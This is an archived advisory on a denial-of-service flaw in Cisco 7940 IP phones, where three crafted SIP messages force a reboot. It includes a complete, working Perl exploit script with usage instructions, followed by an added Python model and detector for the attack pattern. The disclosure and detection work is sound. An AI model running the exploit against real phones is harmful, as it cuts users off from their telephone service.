
cisco-dos.txt

Posted Aug 21, 2007
Authored by Radu State

The Cisco 7940 is susceptible to a denial of service vulnerability when sent three specially crafted SIP messages. Demonstration exploit included.

tags | exploit, denial of service
systems | cisco
SHA-256 | 134337ca6ad629cf4af363ffced7f718f0a59e26375e2aa87831e28d21612a40

MADYNES Security Advisory: stateful SIP remote DoS on Cisco 7940

Date of Discovery 3 February, 2007

ID: KIPH5

Synopsis

Sending a series of three SIP messages causes the device to reboot. The
phone's SIP stack does not properly validate the state of its
transaction/dialog engine before acting on a request.
The vendor was informed in March 2007 and acknowledged the vulnerability.
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH. It is one of the first
published vulnerabilities whose trigger requires advanced state tracking
(a specific sequence of related messages rather than a single malformed one).

Background

* SIP (RFC 2543, superseded by RFC 3261) is the IETF-standardized signalling
protocol for VoIP. It is ASCII based; the INVITE request is used to initiate
and maintain a communication session.


Affected devices: Cisco 7940 IP phone (possibly others as well) running
firmware P0S3-08-6-00



Impact
A remote attacker can crash the phone, and thus cause a denial of service,
by sending three crafted SIP messages.

Resolution
Fixed software will be available from the vendor. Customers following
recommended best practices (i.e. segregating VoIP traffic from data traffic)
will be protected from malicious traffic in most situations. Note that
segregation only limits who can reach the phone's SIP port; any host on the
voice segment can still send the three messages.

Credits

* Humberto J. Abdelnur (Ph.D Student)
* Radu State (Ph.D)
* Olivier Festor (Ph.D)






Configuration of our device:

* Current Firmware : P0S3-08-6-00
* IP-Address obtained by DHCP as 192.168.1.8
* User Name: 7940-1

Vulnerability:

The attack relies on a sequence of messages: none of the individual messages
does any harm by itself, but together they leave the device in an
inconsistent state. The sequence is:

X -------------- INVITE (To tag already set) --------------> Cisco
X <-------- 481 Call/Transaction Does Not Exist ------------ Cisco
X ---------- OPTIONS (same Call-ID, CSeq + 1) -------------> Cisco
X <-------------------------- 200 OK ----------------------- Cisco
X <-------- 481 Call/Transaction Does Not Exist ------------ Cisco
X ---------- OPTIONS (same Call-ID, CSeq + 2) -------------> Cisco

And the device reboots.

The INVITE is unusual in that its To header already carries a tag (the remote
tag that would normally only be present once a dialog exists), so the phone
answers 481 rather than starting a call. The two OPTIONS requests that follow
must carry the same Call-ID as the INVITE and a CSeq that increments with
each message; otherwise the test does not trigger.


Exploit:

To run the exploit, launch the file stateful-cisco-8.6.pl (with the
configuration above) as:

perl stateful-cisco-8.6.pl 192.168.1.8 5060 7940-1

The script is simple: it does not check which responses are received, it just
waits one second before sending the next message.





#!/usr/bin/perl
# stateful-cisco-8.6.pl: sends INVITE, OPTIONS, OPTIONS to the target phone.
# The source address 192.168.1.2 used in Via/From/Call-ID is the test host's
# and is hard-coded; change $src to the address of the sending host.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>\n" unless defined $ARGV[2];
my ($dst, $port, $user) = @ARGV;
my $src = "192.168.1.2";

my $socket = IO::Socket::INET->new(PeerAddr => $dst,
                                   PeerPort => $port,
                                   Proto    => 'udp')
    or die "cannot create UDP socket: $!\n";

# INVITE with the To tag already set ("remote tag already filled");
# the tab after SIP/2.0/UDP in the Via header is as in the original script
my $invite = "INVITE sip:$user\@$dst SIP/2.0\r\n"
    . "Via: SIP/2.0/UDP\t$src;rport;branch=00\r\n"
    . "From: <sip:gasparin\@$src>;tag=00\r\n"
    . "To: <sip:$user\@$dst>;tag=00\r\n"
    . "Call-ID: et\@$src\r\n"
    . "CSeq: 10 INVITE\r\n"
    . "Content-Length: 0\r\n\r\n";
$socket->send($invite);

# two OPTIONS with the same Call-ID, an incrementing CSeq and no To tag
for my $n (1, 2) {
    sleep(1);   # replies are never read; the sleep only paces the sends
    my $options = "OPTIONS sip:$user\@$dst SIP/2.0\r\n"
        . "Via: SIP/2.0/UDP $src;rport;branch=0$n\r\n"
        . "From: <sip:gasparin\@$src>;tag=0$n\r\n"
        . "To: <sip:$user\@$dst>\r\n"
        . "Call-ID: et\@$src\r\n"
        . "CSeq: " . (10 + $n) . " OPTIONS\r\n"
        . "Content-Length: 0\r\n\r\n";
    $socket->send($options);
}
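The following is an added example, not part of the original advisory or the
Madynes exploit. It covers two things the text above describes: the
three-message sequence (INVITE with a pre-set To tag, then two OPTIONS sharing
its Call-ID with increasing CSeq) and the behaviour a correct SIP stack should
show when it receives it. It builds the messages with the advisory's own values
(Call-ID et@192.168.1.2, CSeq 10/11/12, the gasparin@192.168.1.2 sender from
the script), parses them, runs them through a small model of an RFC 3261
UAS that answers 481 without keeping any state, and finally flags the trigger
pattern in a list of captured requests. The StatefulUas model and the
detector thresholds are illustrative assumptions, not Cisco's implementation.

```python
"""Added example: model and detector for the stateful SIP DoS sequence."""
import re

CRLF = "\r\n"


def build_request(method, user, host, cseq, branch, from_tag, to_tag=None,
                  src="192.168.1.2", call_id="et@192.168.1.2"):
    """Build a minimal SIP request in the shape the exploit sends.
    Only the INVITE gets a To tag: that is the 'remote tag already filled'."""
    to_hdr = f"<sip:{user}@{host}>" + (f";tag={to_tag}" if to_tag else "")
    lines = [
        f"{method} sip:{user}@{host} SIP/2.0",
        f"Via: SIP/2.0/UDP {src};rport;branch={branch}",
        f"From: <sip:gasparin@{src}>;tag={from_tag}",
        f"To: {to_hdr}",
        f"Call-ID: {call_id}",
        f"CSeq: {cseq} {method}",
        "Content-Length: 0",
    ]
    return CRLF.join(lines) + CRLF + CRLF


def advisory_sequence(host="192.168.1.8", user="7940-1"):
    """INVITE plus two OPTIONS, in the order and with the values of the exploit."""
    return [
        build_request("INVITE", user, host, 10, "00", "00", to_tag="00"),
        build_request("OPTIONS", user, host, 11, "01", "01"),
        build_request("OPTIONS", user, host, 12, "02", "02"),
    ]


def parse_request(raw):
    """Parse the request line and the headers a dialog check needs."""
    head, _, _body = raw.partition(CRLF + CRLF)
    request_line, *header_lines = head.split(CRLF)
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cseq_num, cseq_method = headers["cseq"].split(None, 1)
    tag = re.search(r";tag=([^;\s]+)", headers.get("to", ""))
    return {"method": method, "uri": uri, "call_id": headers["call-id"],
            "cseq": int(cseq_num), "cseq_method": cseq_method,
            "to_tag": tag.group(1) if tag else None}


class StatefulUas:
    """Hypothetical correct UAS (RFC 3261 section 12.2.2): a request whose To
    header carries a tag matching no dialog is answered 481 and leaves no
    state behind, so later requests on the same Call-ID are ordinary
    out-of-dialog requests and never meet a half-built dialog."""

    def __init__(self):
        self.dialogs = {}  # (call_id, local tag) -> the INVITE that formed it

    def handle(self, raw):
        req = parse_request(raw)
        if req["to_tag"] is not None and \
                (req["call_id"], req["to_tag"]) not in self.dialogs:
            return "481 Call/Transaction Does Not Exist"
        if req["method"] == "OPTIONS":
            return "200 OK"          # capability query, no dialog state
        if req["method"] == "INVITE":
            local_tag = f"lt{len(self.dialogs)}"   # tag-less INVITE forms a dialog
            self.dialogs[(req["call_id"], local_tag)] = req
            return "200 OK"
        return "501 Not Implemented"


def detect_stateful_dos(raw_messages):
    """Flag Call-IDs where an INVITE that already carries a To tag is followed
    by two or more requests reusing its Call-ID with strictly increasing CSeq,
    i.e. the trigger conditions stated in the advisory."""
    followers = {}  # call_id -> (last CSeq seen, in-order follow-ups so far)
    hits = []
    for raw in raw_messages:
        req = parse_request(raw)
        cid = req["call_id"]
        if req["method"] == "INVITE" and req["to_tag"] is not None:
            followers[cid] = (req["cseq"], 0)
        elif cid in followers:
            last, n = followers[cid]
            if req["cseq"] > last:
                followers[cid] = (req["cseq"], n + 1)
                if n + 1 == 2 and cid not in hits:
                    hits.append(cid)
    return hits


if __name__ == "__main__":
    uas = StatefulUas()
    for raw in advisory_sequence():
        print(parse_request(raw)["method"], "->", uas.handle(raw))
    print("flagged Call-IDs:", detect_stateful_dos(advisory_sequence()))
```

The model answers 481, 200 OK, 200 OK and ends with an empty dialog table,
which is the behaviour the phone should have shown; the second 481 in the
advisory's trace is the visible symptom of state that survived the rejected
INVITE. The detector is a starting point for a SIP-aware IDS rule: the
distinctive feature is not any one message but an out-of-dialog INVITE with a
To tag followed by Call-ID reuse.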




